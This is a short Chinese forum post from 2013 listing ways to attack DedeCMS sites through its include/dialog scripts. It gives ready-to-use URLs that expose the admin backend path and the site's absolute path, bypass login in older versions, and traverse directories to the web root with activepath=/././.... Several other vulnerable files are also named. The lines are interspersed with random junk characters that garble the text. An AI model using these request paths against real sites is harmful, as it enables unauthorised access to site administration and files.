1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理& @; }8 V* v, j7 V' u8 a$ W0 h
& G. E; [+ H' P
员帐号,新版本的就直接转向了后台.
% d: w0 G0 @$ b( X/ ?8 Y1 j) G, N$ o9 j8 n8 i' N1 Y
2.include/dialog/config.php会爆出后台管理路径
" S. R( [% Z' ^' ~, A- ?/ k* Z0 |
" J/ F1 Q) f2 a# B9 j) y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录3 |1 I* H& a2 G/ ^6 M, c d2 a
! U4 I7 L5 n) s/ e. t1 M+ A. F4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
( f4 T7 P/ x8 Q# t' W3 B) V3 p5 u3 O
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉" P8 y* s/ o8 t9 q0 ~6 `, x( P
; f' n4 Z# B g# j' M* V6 Y到根目录去.不过这些版本的访问地址有些不同.
3 ~# v# E% a1 r地址为require/dialog/select_soft.php?activepath=/././././././././
# x0 U+ q2 n S+ \4 A, ]- s3 d
, [! }7 l# t& I7 s6 Uinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
4 }) o4 S6 b/ D, v0 i! U存在相同问题的文件还有
@( Y' d" R) g, E9 u+ yinclude\dialog\select_images.php
A$ f- `; a/ l" _9 [include\dialog\select_media.php6 p8 I h4 l4 X ]& `2 e
include\dialog\select_templets.php7 ~$ p& C8 U3 ~0 ?8 {1 Q; W; a
|
发表于 2013-4-16 16:50:43
收藏
支持
反对